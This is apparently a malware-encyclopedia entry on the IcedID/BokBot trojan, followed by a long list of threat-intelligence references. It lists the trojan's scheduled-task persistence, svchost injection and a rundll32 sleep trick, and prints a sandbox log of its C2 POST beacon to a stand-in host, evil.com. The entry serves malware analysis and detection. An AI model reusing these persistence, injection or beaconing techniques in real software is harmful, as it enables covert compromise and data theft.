SYMBOLCOMMON_NAMEaka. SYNONYMS
win.icedid (Back to overview)

IcedID

aka: BokBot, IceID

Actor(s): GOLD CABIN, Lunar Spider

URLhaus        

Analysis Observations:

* It sets up persistence by creating a Scheduled Task with the following characteristics:
* Name: Update
* Trigger: At Log on
* Action: %LocalAppData%\$Example\\waroupada.exe /i
* Conditions: Stop if the computer ceases to be idle.
* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.
* The filename remained static during analysis.
* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it
* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.
* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.
* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:
rundll32.exe kernel32,Sleep -s
* Setup a local listener to proxy traffic on 127.0.0.1:50000

**[Example Log from C2 Network Communication]**
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2

References
2022-05-12Intel 471Intel 471
@online{471:20220512:what:05369d4, author = {Intel 471}, title = {{What malware to look for if you want to prevent a ransomware attack}}, date = {2022-05-12}, organization = {Intel 471}, url = {https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike}, language = {English}, urldate = {2022-05-13} } What malware to look for if you want to prevent a ransomware attack
Conti BumbleBee Cobalt Strike IcedID Sliver
2022-05-11InfoSec Handlers Diary BlogBrad Duncan
@online{duncan:20220511:ta578:0a0a686, author = {Brad Duncan}, title = {{TA578 using thread-hijacked emails to push ISO files for Bumblebee malware}}, date = {2022-05-11}, organization = {InfoSec Handlers Diary Blog}, url = {https://isc.sans.edu/diary/28636}, language = {English}, urldate = {2022-05-11} } TA578 using thread-hijacked emails to push ISO files for Bumblebee malware
BumbleBee Cobalt Strike IcedID PhotoLoader
2022-05-09CybereasonLior Rochberger
@online{rochberger:20220509:cybereason:9178f63, author = {Lior Rochberger}, title = {{Cybereason vs. Quantum Locker Ransomware}}, date = {2022-05-09}, organization = {Cybereason}, url = {https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware}, language = {English}, urldate = {2022-05-11} } Cybereason vs. Quantum Locker Ransomware
IcedID Mount Locker
2022-05-09MicrosoftMicrosoft 365 Defender Threat Intelligence Team, Microsoft Threat Intelligence Center (MSTIC)
@online{team:20220509:ransomwareasaservice:13ec472, author = {Microsoft 365 Defender Threat Intelligence Team and Microsoft Threat Intelligence Center (MSTIC)}, title = {{Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself}}, date = {2022-05-09}, organization = {Microsoft}, url = {https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself}, language = {English}, urldate = {2022-05-17} } Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself
AnchorDNS BlackCat BlackMatter Conti DarkSide HelloKitty Hive LockBit REvil FAKEUPDATES Griffon ATOMSILO BazarBackdoor BlackCat BlackMatter Blister Cobalt Strike Conti DarkSide Emotet FiveHands Gozi HelloKitty Hive IcedID ISFB JSSLoader LockBit LockFile Maze NightSky Pandora Phobos Phoenix Locker PhotoLoader QakBot REvil Rook Ryuk SystemBC TrickBot WastedLocker
2022-05-04Twitter (@felixw3000)Felix
@online{felix:20220504:twitter:0fb7e35, author = {Felix}, title = {{Twitter Thread with info on infection chain with IcedId, Cobalt Strike, and Hidden VNC.}}, date = {2022-05-04}, organization = {Twitter (@felixw3000)}, url = {https://twitter.com/felixw3000/status/1521816045769662468}, language = {English}, urldate = {2022-05-09} } Twitter Thread with info on infection chain with IcedId, Cobalt Strike, and Hidden VNC.
Cobalt Strike IcedID PhotoLoader
2022-04-28SymantecKarthikeyan C Kasiviswanathan, Vishal Kamble
@online{kasiviswanathan:20220428:ransomware:95feafb, author = {Karthikeyan C Kasiviswanathan and Vishal Kamble}, title = {{Ransomware: How Attackers are Breaching Corporate Networks}}, date = {2022-04-28}, organization = {Symantec}, url = {https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker}, language = {English}, urldate = {2022-05-04} } Ransomware: How Attackers are Breaching Corporate Networks
AvosLocker Conti Emotet Hive IcedID PhotoLoader QakBot TrickBot
2022-04-26Intel 471Intel 471
@online{471:20220426:conti:6bcff7d, author = {Intel 471}, title = {{Conti and Emotet: A constantly destructive duo}}, date = {2022-04-26}, organization = {Intel 471}, url = {https://intel471.com/blog/conti-emotet-ransomware-conti-leaks}, language = {English}, urldate = {2022-04-29} } Conti and Emotet: A constantly destructive duo
Cobalt Strike Conti Emotet IcedID QakBot TrickBot
2022-04-25The DFIR ReportThe DFIR Report
@online{report:20220425:quantum:128d2b3, author = {The DFIR Report}, title = {{Quantum Ransomware}}, date = {2022-04-25}, organization = {The DFIR Report}, url = {https://thedfirreport.com/2022/04/25/quantum-ransomware/}, language = {English}, urldate = {2022-04-25} } Quantum Ransomware
Cobalt Strike IcedID
2022-04-17BushidoToken BlogBushidoToken
@online{bushidotoken:20220417:lessons:d4d0595, author = {BushidoToken}, title = {{Lessons from the Conti Leaks}}, date = {2022-04-17}, organization = {BushidoToken Blog}, url = {https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html}, language = {English}, urldate = {2022-04-25} } Lessons from the Conti Leaks
BazarBackdoor Conti Emotet IcedID Ryuk TrickBot
2022-04-14Cert-UACert-UA
@online{certua:20220414:cyberattack:915dfa7, author = {Cert-UA}, title = {{Cyberattack on Ukrainian state organizations using IcedID malware (CERT-UA#4464)}}, date = {2022-04-14}, organization = {Cert-UA}, url = {https://cert.gov.ua/article/39609}, language = {Ukrainian}, urldate = {2022-04-20} } Cyberattack on Ukrainian state organizations using IcedID malware (CERT-UA#4464)
IcedID
2022-04-14Bleeping ComputerBill Toulas
@online{toulas:20220414:hackers:2b1153c, author = {Bill Toulas}, title = {{Hackers target Ukrainian govt with IcedID malware, Zimbra exploits}}, date = {2022-04-14}, organization = {Bleeping Computer}, url = {https://www.bleepingcomputer.com/news/security/hackers-target-ukrainian-govt-with-icedid-malware-zimbra-exploits/}, language = {English}, urldate = {2022-04-15} } Hackers target Ukrainian govt with IcedID malware, Zimbra exploits
IcedID
2022-04-04The DFIR Report@0xtornado, @yatinwad, @MettalicHack, @_pete_0
@online{0xtornado:20220404:stolen:3df91a7, author = {@0xtornado and @yatinwad and @MettalicHack and @_pete_0}, title = {{Stolen Images Campaign Ends in Conti Ransomware}}, date = {2022-04-04}, organization = {The DFIR Report}, url = {https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/}, language = {English}, urldate = {2022-04-04} } Stolen Images Campaign Ends in Conti Ransomware
Conti IcedID
2022-03-31TrellixJohn Fokker, Jambul Tologonov
@online{fokker:20220331:conti:3bc2974, author = {John Fokker and Jambul Tologonov}, title = {{Conti Leaks: Examining the Panama Papers of Ransomware}}, date = {2022-03-31}, organization = {Trellix}, url = {https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html}, language = {English}, urldate = {2022-04-07} } Conti Leaks: Examining the Panama Papers of Ransomware
LockBit Amadey Buer Conti IcedID LockBit Mailto Maze PhotoLoader Ryuk TrickBot
2022-03-29Threat PostElizabeth Montalbano
@online{montalbano:20220329:exchange:ff88f41, author = {Elizabeth Montalbano}, title = {{Exchange Servers Speared in IcedID Phishing Campaign}}, date = {2022-03-29}, organization = {Threat Post}, url = {https://threatpost.com/exchange-servers-speared-in-icedid-phishing-campaign/179137/}, language = {English}, urldate = {2022-03-31} } Exchange Servers Speared in IcedID Phishing Campaign
IcedID
2022-03-28FortinetJames Slaughter, Val Saengphaibul, Fred Gutierrez
@online{slaughter:20220328:spoofed:0cd6f0e, author = {James Slaughter and Val Saengphaibul and Fred Gutierrez}, title = {{Spoofed Invoice Used to Drop IcedID}}, date = {2022-03-28}, organization = {Fortinet}, url = {https://www.fortinet.com/blog/threat-research/spoofed-invoice-drops-iced-id}, language = {English}, urldate = {2022-03-31} } Spoofed Invoice Used to Drop IcedID
IcedID
2022-03-28IntezerJoakim Kennedy, Ryan Robinson
@online{kennedy:20220328:new:cede4da, author = {Joakim Kennedy and Ryan Robinson}, title = {{New Conversation Hijacking Campaign Delivering IcedID}}, date = {2022-03-28}, organization = {Intezer}, url = {https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/}, language = {English}, urldate = {2022-04-05} } New Conversation Hijacking Campaign Delivering IcedID
IcedID PhotoLoader
2022-03-28Bleeping ComputerBill Toulas
@online{toulas:20220328:microsoft:5bc32d1, author = {Bill Toulas}, title = {{Microsoft Exchange targeted for IcedID reply-chain hijacking attacks}}, date = {2022-03-28}, organization = {Bleeping Computer}, url = {https://www.bleepingcomputer.com/news/security/microsoft-exchange-targeted-for-icedid-reply-chain-hijacking-attacks/}, language = {English}, urldate = {2022-03-30} } Microsoft Exchange targeted for IcedID reply-chain hijacking attacks
IcedID
2022-03-23SecureworksCounter Threat Unit ResearchTeam
@online{researchteam:20220323:threat:84ad46c, author = {Counter Threat Unit ResearchTeam}, title = {{Threat Intelligence Executive Report Volume 2022, Number 2}}, date = {2022-03-23}, organization = {Secureworks}, url = {https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx}, language = {English}, urldate = {2022-03-25} } Threat Intelligence Executive Report Volume 2022, Number 2
Conti Emotet IcedID TrickBot
2022-03-23SecureworksCounter Threat Unit ResearchTeam
@online{researchteam:20220323:gold:0f3da90, author = {Counter Threat Unit ResearchTeam}, title = {{GOLD ULRICK Leaks Reveal Organizational Structure and Relationships}}, date = {2022-03-23}, organization = {Secureworks}, url = {https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships}, language = {English}, urldate = {2022-03-25} } GOLD ULRICK Leaks Reveal Organizational Structure and Relationships
Conti Emotet IcedID TrickBot
2022-03-17Github (eln0ty)Abdallah Elnoty
@online{elnoty:20220317:icedid:0b8ef27, author = {Abdallah Elnoty}, title = {{IcedID Analysis}}, date = {2022-03-17}, organization = {Github (eln0ty)}, url = {https://eln0ty.github.io/malware%20analysis/IcedID/}, language = {English}, urldate = {2022-03-22} } IcedID Analysis
IcedID
2022-03-17Trend MicroTrend Micro Research
@techreport{research:20220317:navigating:5ad631e, author = {Trend Micro Research}, title = {{Navigating New Frontiers Trend Micro 2021 Annual Cybersecurity Report}}, date = {2022-03-17}, institution = {Trend Micro}, url = {https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf}, language = {English}, urldate = {2022-03-22} } Navigating New Frontiers Trend Micro 2021 Annual Cybersecurity Report
REvil BazarBackdoor Buer IcedID QakBot REvil
2022-03-09nikpxxors
@online{xors:20220309:bokbot:925e438, author = {xors}, title = {{BokBot Technical Analysis}}, date = {2022-03-09}, organization = {nikpx}, url = {https://nikpx.github.io/malware/analysis/2022/03/09/BokBot}, language = {English}, urldate = {2022-03-10} } BokBot Technical Analysis
IcedID
2022-02-10CybereasonCybereason Global SOC Team
@online{team:20220210:threat:320574f, author = {Cybereason Global SOC Team}, title = {{Threat Analysis Report: All Paths Lead to Cobalt Strike - IcedID, Emotet and QBot}}, date = {2022-02-10}, organization = {Cybereason}, url = {https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot}, language = {English}, urldate = {2022-02-10} } Threat Analysis Report: All Paths Lead to Cobalt Strike - IcedID, Emotet and QBot
Cobalt Strike Emotet IcedID QakBot
2022-01-18Recorded FutureInsikt Group®
@techreport{group:20220118:2021:9cff6fc, author = {Insikt Group®}, title = {{2021 Adversary Infrastructure Report}}, date = {2022-01-18}, institution = {Recorded Future}, url = {https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf}, language = {English}, urldate = {2022-01-24} } 2021 Adversary Infrastructure Report
BazarBackdoor Cobalt Strike Dridex IcedID QakBot TrickBot
2022-01-01forensicitguyTony Lambert
@online{lambert:20220101:analyzing:1512a76, author = {Tony Lambert}, title = {{Analyzing an IcedID Loader Document}}, date = {2022-01-01}, organization = {forensicitguy}, url = {https://forensicitguy.github.io/analyzing-icedid-document/}, language = {English}, urldate = {2022-01-25} } Analyzing an IcedID Loader Document
IcedID
2021-12-16InfoSec Handlers Diary BlogBrad Duncan
@online{duncan:20211216:how:6fd0b06, author = {Brad Duncan}, title = {{How the "Contact Forms" campaign tricks people}}, date = {2021-12-16}, organization = {InfoSec Handlers Diary Blog}, url = {https://isc.sans.edu/forums/diary/How+the+Contact+Forms+campaign+tricks+people/28142/}, language = {English}, urldate = {2021-12-31} } How the "Contact Forms" campaign tricks people
IcedID
2021-12-03SANS ISC InfoSec ForumsBrad Duncan
@online{duncan:20211203:ta551:f71be57, author = {Brad Duncan}, title = {{TA551 (Shathak) pushes IcedID (Bokbot)}}, date = {2021-12-03}, organization = {SANS ISC InfoSec Forums}, url = {https://isc.sans.edu/forums/diary/TA551+Shathak+pushes+IcedID+Bokbot/28092/}, language = {English}, urldate = {2021-12-06} } TA551 (Shathak) pushes IcedID (Bokbot)
IcedID
2021-11-16IronNetIronNet Threat Research, Morgan Demboski, Joey Fitzpatrick, Peter Rydzynski
@online{research:20211116:how:d7fdaf8, author = {IronNet Threat Research and Morgan Demboski and Joey Fitzpatrick and Peter Rydzynski}, title = {{How IronNet's Behavioral Analytics Detect REvil and Conti Ransomware}}, date = {2021-11-16}, organization = {IronNet}, url = {https://www.ironnet.com/blog/ransomware-graphic-blog}, language = {English}, urldate = {2021-11-25} } How IronNet's Behavioral Analytics Detect REvil and Conti Ransomware
Cobalt Strike Conti IcedID REvil
2021-11-12Recorded FutureInsikt Group®
@techreport{group:20211112:business:6d6cffa, author = {Insikt Group®}, title = {{The Business of Fraud: Botnet Malware Dissemination}}, date = {2021-11-12}, institution = {Recorded Future}, url = {https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf}, language = {English}, urldate = {2021-11-17} } The Business of Fraud: Botnet Malware Dissemination
Mozi Dridex IcedID QakBot TrickBot
2021-11-04splunkSplunk Threat Research Team
@online{team:20211104:detecting:d8aba5b, author = {Splunk Threat Research Team}, title = {{Detecting IcedID... Could It Be A Trickbot Copycat?}}, date = {2021-11-04}, organization = {splunk}, url = {https://www.splunk.com/en_us/blog/security/detecting-icedid-could-it-be-a-trickbot-copycat.html}, language = {English}, urldate = {2021-11-08} } Detecting IcedID... Could It Be A Trickbot Copycat?
IcedID
2021-11-03Team Cymrutcblogposts
@online{tcblogposts:20211103:webinject:f4d41bb, author = {tcblogposts}, title = {{Webinject Panel Administration: A Vantage Point into Multiple Threat Actor Campaigns - A Case Study on the Value of Threat Reconnaisance}}, date = {2021-11-03}, organization = {Team Cymru}, url = {https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/}, language = {English}, urldate = {2021-11-08} } Webinject Panel Administration: A Vantage Point into Multiple Threat Actor Campaigns - A Case Study on the Value of Threat Reconnaisance
DoppelDridex IcedID QakBot Zloader
2021-10-18The DFIR ReportThe DFIR Report
@online{report:20211018:icedid:0b574b0, author = {The DFIR Report}, title = {{IcedID to XingLocker Ransomware in 24 hours}}, date = {2021-10-18}, organization = {The DFIR Report}, url = {https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/}, language = {English}, urldate = {2021-10-22} } IcedID to XingLocker Ransomware in 24 hours
Cobalt Strike IcedID Mount Locker
2021-10-15Trend MicroFernando Mercês
@online{mercs:20211015:ransomware:c944933, author = {Fernando Mercês}, title = {{Ransomware Operators Found Using New "Franchise" Business Model}}, date = {2021-10-15}, organization = {Trend Micro}, url = {https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html}, language = {English}, urldate = {2021-10-24} } Ransomware Operators Found Using New "Franchise" Business Model
Glupteba IcedID Mount Locker
2021-09-03Trend MicroMohamad Mokbel
@techreport{mokbel:20210903:state:df86499, author = {Mohamad Mokbel}, title = {{The State of SSL/TLS Certificate Usage in Malware C&C Communications}}, date = {2021-09-03}, institution = {Trend Micro}, url = {https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf}, language = {English}, urldate = {2021-09-19} } The State of SSL/TLS Certificate Usage in Malware C&C Communications
AdWind ostap AsyncRAT BazarBackdoor BitRAT Buer Chthonic CloudEyE Cobalt Strike DCRat Dridex FindPOS GootKit Gozi IcedID ISFB Nanocore RAT Orcus RAT PandaBanker Qadars QakBot Quasar RAT Rockloader ServHelper Shifu SManager TorrentLocker TrickBot Vawtrak Zeus Zloader
2021-08-15SymantecThreat Hunter Team
@techreport{team:20210815:ransomware:f799696, author = {Threat Hunter Team}, title = {{The Ransomware Threat}}, date = {2021-08-15}, institution = {Symantec}, url = {https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf}, language = {English}, urldate = {2021-12-15} } The Ransomware Threat
Babuk BlackMatter DarkSide Avaddon Babuk BADHATCH BazarBackdoor BlackMatter Clop Cobalt Strike Conti DarkSide DoppelPaymer Egregor Emotet FiveHands FriedEx Hades IcedID LockBit Maze MegaCortex MimiKatz QakBot RagnarLocker REvil Ryuk TrickBot WastedLocker
2021-08-05The RecordCatalin Cimpanu
@online{cimpanu:20210805:meet:bce8310, author = {Catalin Cimpanu}, title = {{Meet Prometheus, the secret TDS behind some of today’s malware campaigns}}, date = {2021-08-05}, organization = {The Record}, url = {https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/}, language = {English}, urldate = {2021-08-06} } Meet Prometheus, the secret TDS behind some of today’s malware campaigns
Buer campoloader IcedID QakBot
2021-08-05Group-IBViktor Okorokov, Nikita Rostovcev
@online{okorokov:20210805:prometheus:38ab6a6, author = {Viktor Okorokov and Nikita Rostovcev}, title = {{Prometheus TDS The key to success for Campo Loader, Hancitor, IcedID, and QBot}}, date = {2021-08-05}, organization = {Group-IB}, url = {https://blog.group-ib.com/prometheus-tds}, language = {English}, urldate = {2021-08-06} } Prometheus TDS The key to success for Campo Loader, Hancitor, IcedID, and QBot
Prometheus Backdoor Buer campoloader Hancitor IcedID QakBot
2021-07-30HPPatrick Schläpfer
@online{schlpfer:20210730:detecting:2291323, author = {Patrick Schläpfer}, title = {{Detecting TA551 domains}}, date = {2021-07-30}, organization = {HP}, url = {https://threatresearch.ext.hp.com/detecting-ta551-domains/}, language = {English}, urldate = {2021-08-02} } Detecting TA551 domains
Valak Dridex IcedID ISFB QakBot
2021-07-26vmwareQuentin Fois, Pavankumar Chaudhari
@online{fois:20210726:hunting:ff1181b, author = {Quentin Fois and Pavankumar Chaudhari}, title = {{Hunting IcedID and unpacking automation with Qiling}}, date = {2021-07-26}, organization = {vmware}, url = {https://blogs.vmware.com/security/2021/07/hunting-icedid-and-unpacking-automation-with-qiling.html}, language = {English}, urldate = {2021-07-27} } Hunting IcedID and unpacking automation with Qiling
IcedID
2021-07-23Github (Lastline-Inc)Quentin Fois, Pavankumar Chaudhari
@online{fois:20210723:yara:e9a8a22, author = {Quentin Fois and Pavankumar Chaudhari}, title = {{YARA rules, IOCs and Scripts for extracting IcedID C2s}}, date = {2021-07-23}, organization = {Github (Lastline-Inc)}, url = {https://github.com/Lastline-Inc/iocs-tools/tree/main/2021-07-IcedID-Part-2}, language = {English}, urldate = {2021-07-27} } YARA rules, IOCs and Scripts for extracting IcedID C2s
IcedID
2021-07-19The DFIR ReportThe DFIR Report
@online{report:20210719:icedid:0365384, author = {The DFIR Report}, title = {{IcedID and Cobalt Strike vs Antivirus}}, date = {2021-07-19}, organization = {The DFIR Report}, url = {https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/}, language = {English}, urldate = {2021-07-20} } IcedID and Cobalt Strike vs Antivirus
Cobalt Strike IcedID
2021-07-14Cerium NetworksBlumira
@online{blumira:20210714:threat:614d084, author = {Blumira}, title = {{Threat of the Month: IcedID Malware}}, date = {2021-07-14}, organization = {Cerium Networks}, url = {https://ceriumnetworks.com/threat-of-the-month-icedid-malware/}, language = {English}, urldate = {2021-07-20} } Threat of the Month: IcedID Malware
IcedID
2021-07-08vmwareQuentin Fois, Pavankumar Chaudhari
@online{fois:20210708:icedid:47da76d, author = {Quentin Fois and Pavankumar Chaudhari}, title = {{IcedID: Analysis and Detection}}, date = {2021-07-08}, organization = {vmware}, url = {https://blogs.vmware.com/security/2021/07/icedid-analysis-and-detection.html}, language = {English}, urldate = {2021-07-20} } IcedID: Analysis and Detection
IcedID
2021-06-30CynetMax Malyutin
@online{malyutin:20210630:shelob:1c93f5d, author = {Max Malyutin}, title = {{Shelob Moonlight – Spinning a Larger Web From IcedID to CONTI, a Trojan and Ransomware collaboration}}, date = {2021-06-30}, organization = {Cynet}, url = {https://www.cynet.com/attack-techniques-hands-on/shelob-moonlight-spinning-a-larger-web/}, language = {English}, urldate = {2021-07-20} } Shelob Moonlight – Spinning a Larger Web From IcedID to CONTI, a Trojan and Ransomware collaboration
Conti IcedID
2021-06-24SentinelOneMarco Figueroa
@online{figueroa:20210624:evasive:7f0d507, author = {Marco Figueroa}, title = {{Evasive Maneuvers | Massive IcedID Campaign Aims For Stealth with Benign Macros}}, date = {2021-06-24}, organization = {SentinelOne}, url = {https://labs.sentinelone.com/evasive-maneuvers-massive-icedid-campaign-aims-for-stealth-with-benign-macros/}, language = {English}, urldate = {2021-06-29} } Evasive Maneuvers | Massive IcedID Campaign Aims For Stealth with Benign Macros
IcedID
2021-06-24KasperskyAnton Kuzmenko
@online{kuzmenko:20210624:malicious:83a5c83, author = {Anton Kuzmenko}, title = {{Malicious spam campaigns delivering banking Trojans}}, date = {2021-06-24}, organization = {Kaspersky}, url = {https://securelist.com/malicious-spam-campaigns-delivering-banking-trojans/102917}, language = {English}, urldate = {2021-06-25} } Malicious spam campaigns delivering banking Trojans
IcedID QakBot
2021-06-20The DFIR ReportThe DFIR Report
@online{report:20210620:from:aadb7e8, author = {The DFIR Report}, title = {{From Word to Lateral Movement in 1 Hour}}, date = {2021-06-20}, organization = {The DFIR Report}, url = {https://thedfirreport.com/2021/06/20/from-word-to-lateral-movement-in-1-hour/}, language = {English}, urldate = {2021-06-22} } From Word to Lateral Movement in 1 Hour
Cobalt Strike IcedID
2021-06-16ProofpointSelena Larson, Daniel Blackford, Garrett M. Graff
@online{larson:20210616:first:2e436a0, author = {Selena Larson and Daniel Blackford and Garrett M. Graff}, title = {{The First Step: Initial Access Leads to Ransomware}}, date = {2021-06-16}, organization = {Proofpoint}, url = {https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware}, language = {English}, urldate = {2021-06-21} } The First Step: Initial Access Leads to Ransomware
BazarBackdoor Egregor IcedID Maze QakBot REvil Ryuk TrickBot WastedLocker
2021-05-29Youtube (AhmedS Kasmani)AhmedS Kasmani
@online{kasmani:20210529:analysis:96b0902, author = {AhmedS Kasmani}, title = {{Analysis of ICEID Malware Installer DLL}}, date = {2021-05-29}, organization = {Youtube (AhmedS Kasmani)}, url = {https://www.youtube.com/watch?v=wMXD4Sv1Alw}, language = {English}, urldate = {2021-06-04} } Analysis of ICEID Malware Installer DLL
IcedID
2021-05-26Check PointAlex Ilgayev
@online{ilgayev:20210526:melting:40f5caf, author = {Alex Ilgayev}, title = {{Melting Ice – Tracking IcedID Servers with a few simple steps}}, date = {2021-05-26}, organization = {Check Point}, url = {https://research.checkpoint.com/2021/melting-ice-tracking-icedid-servers-with-a-few-simple-steps/}, language = {English}, urldate = {2021-06-09} } Melting Ice – Tracking IcedID Servers with a few simple steps
IcedID
2021-05-19Team CymruJosh Hopkins, Andy Kraus, Nick Byers
@online{hopkins:20210519:tracking:45749be, author = {Josh Hopkins and Andy Kraus and Nick Byers}, title = {{Tracking BokBot Infrastructure Mapping a Vast and Currently Active BokBot Network}}, date = {2021-05-19}, organization = {Team Cymru}, url = {https://team-cymru.com/blog/2021/05/19/tracking-bokbot-infrastructure/}, language = {English}, urldate = {2021-05-26} } Tracking BokBot Infrastructure Mapping a Vast and Currently Active BokBot Network
IcedID
2021-05-18RECON INFOSECAndrew Cook
@online{cook:20210518:encounter:c4ef6d9, author = {Andrew Cook}, title = {{An Encounter With TA551/Shathak}}, date = {2021-05-18}, organization = {RECON INFOSEC}, url = {https://blog.reconinfosec.com/an-encounter-with-ta551-shathak}, language = {English}, urldate = {2021-05-25} } An Encounter With TA551/Shathak
IcedID
2021-05-17TelekomThomas Barabosch
@online{barabosch:20210517:lets:04a8b63, author = {Thomas Barabosch}, title = {{Let’s set ice on fire: Hunting and detecting IcedID infections}}, date = {2021-05-17}, organization = {Telekom}, url = {https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240}, language = {English}, urldate = {2021-05-17} } Let’s set ice on fire: Hunting and detecting IcedID infections
IcedID
2021-05-17Github (telekom-security)Deutsche Telekom Security GmbH
@online{gmbh:20210517:icedidanalysis:e985983, author = {Deutsche Telekom Security GmbH}, title = {{icedid_analysis}}, date = {2021-05-17}, organization = {Github (telekom-security)}, url = {https://github.com/telekom-security/icedid_analysis}, language = {English}, urldate = {2021-05-17} } icedid_analysis
IcedID
2021-05-12The DFIR Report
@online{report:20210512:conti:598c5f2, author = {The DFIR Report}, title = {{Conti Ransomware}}, date = {2021-05-12}, url = {https://thedfirreport.com/2021/05/12/conti-ransomware/}, language = {English}, urldate = {2021-05-13} } Conti Ransomware
Cobalt Strike Conti IcedID
2021-05-10MALWATIONmalwation
@online{malwation:20210510:icedid:0637539, author = {malwation}, title = {{IcedID Malware Technical Analysis Report}}, date = {2021-05-10}, organization = {MALWATION}, url = {https://malwation.com/icedid-malware-technical-analysis-report/}, language = {English}, urldate = {2021-07-02} } IcedID Malware Technical Analysis Report
IcedID
2021-04-19NetresecErik Hjelmvik
@online{hjelmvik:20210419:analysing:c6bff49, author = {Erik Hjelmvik}, title = {{Analysing a malware PCAP with IcedID and Cobalt Strike traffic}}, date = {2021-04-19}, organization = {Netresec}, url = {https://netresec.com/?b=214d7ff}, language = {English}, urldate = {2021-04-20} } Analysing a malware PCAP with IcedID and Cobalt Strike traffic
Cobalt Strike IcedID
2021-04-17YouTube (Worcester DEFCON Group)Joel Snape, Nettitude
@online{snape:20210417:inside:2c3ae5c, author = {Joel Snape and Nettitude}, title = {{Inside IcedID: Anatomy Of An Infostealer}}, date = {2021-04-17}, organization = {YouTube (Worcester DEFCON Group)}, url = {https://www.youtube.com/watch?v=YEqLIR6hfOM}, language = {English}, urldate = {2021-04-20} } Inside IcedID: Anatomy Of An Infostealer
IcedID
2021-04-12Trend MicroRaphael Centeno, Don Ovid Ladores, Lala Manly, Junestherry Salvador, Frankylnn Uy
